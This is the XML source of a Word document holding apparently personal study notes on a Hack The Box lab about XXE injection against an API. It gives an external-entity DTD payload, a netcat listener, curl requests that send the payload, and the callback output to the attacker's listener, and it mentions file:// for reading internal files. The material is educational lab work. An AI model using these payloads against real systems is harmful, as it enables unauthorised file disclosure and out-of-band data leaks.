            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>&lt;email&gt;test@test.com&lt;/email</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;password&gt;P@ssw0rd123&lt;/password&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/root&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="7E13EFBF" wp14:textId="66097587">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">We defined a DTD called </w:t>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>pwn</w:t>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>, and inside of that, we have an ENTITY. We may also define custom entities (i.e., XML variables) in XML DTDs to allow refactoring of variables and reduce repetitive data. This can be done using the ENTITY keyword, followed by the ENTITY name and its value.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="21C714B0" wp14:textId="5050D0FE">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">We have called our external entity </w:t>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>somename</w:t>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it will use the SYSTEM keyword, which must have the value of a URL, or we can try using a URI scheme/protocol such as </w:t>
      </w:r>
      <w:hyperlink r:id="R620b3d5676ed42e6">
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>file://</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> to call internal files.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="76A00641" wp14:textId="2F623230">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let us set up a Netcat listener as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="287C9167" wp14:textId="5DAF9252">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ nc -nlvp 4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>listening on [any] 4444 ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="10B89DF0" wp14:textId="05037398">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Now let us make an API call containing the payload we crafted above.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="79120309" wp14:textId="008212AC">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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 xml:space="preserve">yovecio@htb[/htb]$ curl -X POST </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3001/api/login -d '&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE pwn [&lt;!ENTITY somename SYSTEM "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;VPN/TUN</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adapter IP&gt;:&lt;LISTENER PORT&gt;"&gt; </w:t>
      </w:r>
      <w:hyperlink r:id="R29d625267b4d4e0a">
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>]&gt;&lt;root&gt;&lt;email&gt;test@test.com&lt;/email&gt;&lt;password&gt;P@ssw0rd123&lt;/password&gt;&lt;/root</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&gt;'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;p&gt;Sorry, we cannot find a account with &lt;b&gt;&lt;/b&gt; email.&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="26C56C28" wp14:textId="2FA87EFA">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>We notice no connection being made to our listener. This is because we have defined our external entity, but we haven't tried to use it. We can do that as follows.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="6C7545A5" wp14:textId="7DCFB042">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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 xml:space="preserve">yovecio@htb[/htb]$ curl -X POST </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3001/api/login -d '&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE pwn [&lt;!ENTITY somename SYSTEM "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;VPN/TUN</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adapter IP&gt;:&lt;LISTENER PORT&gt;"&gt; ]&gt;&lt;root&gt;&lt;email&gt;&amp;somename;&lt;/email&gt;&lt;password&gt;P@ssw0rd123&lt;/password&gt;&lt;/root&gt;'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="005EB85C" wp14:textId="4A1E4AC3">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>After the call to the API, you will notice a connection being made to the listener.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="33C6B220" wp14:textId="76AD4B1E">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>yovecio@htb[/htb]$ nc -nlvp 4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>listening on [any] 4444 ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>connect to [&lt;VPN/TUN Adapter IP&gt;] from (UNKNOWN) [&lt;TARGET IP&gt;] 54984</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>GET / HTTP/1.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Host: &lt;VPN/TUN Adapter IP&gt;:4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="20B7EEC3" wp14:textId="3BEEED99">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="3FC635E4" w:rsidR="3FC635E4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>The API is vulnerable to XXE Injection.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3FC635E4" wp14:paraId="2DC08235" wp14:textId="36EB3A6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f50d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FD16C"/>
    <w:rsid w:val="3FC635E4"/>
    <w:rsid w:val="4E1FD1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16C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B5DFCE86-5848-4658-9EF0-8A03F6FF2C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ademy.hackthebox.com/module/details/134" TargetMode="External" Id="R6e4a76bdbc654518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="R1a020bc9fb4245b4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:encoding=&quot;UTF-8&quot;?&gt;&lt;root&gt;&lt;email&gt;test@test.com&lt;/email&gt;&lt;password&gt;P@ssw0rd123&lt;/password&gt;&lt;/root" TargetMode="External" Id="R5c9c27f820334bd5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:&lt;email&gt;test@test.com&lt;/email" TargetMode="External" Id="Rec01661d1a2e4e43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://" TargetMode="External" Id="R620b3d5676ed42e6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:]&gt;&lt;root&gt;&lt;email&gt;test@test.com&lt;/email&gt;&lt;password&gt;P@ssw0rd123&lt;/password&gt;&lt;/root" TargetMode="External" Id="R29d625267b4d4e0a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="Rb4672bac612049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2023-12-14T11:53:47.4393739Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-14T11:53:59.6195332Z</dcterms:modified>
  <dc:creator>Aleksandar Milosavljevic</dc:creator>
  <lastModifiedBy>Aleksandar Milosavljevic</lastModifiedBy>
</coreProperties>
</file>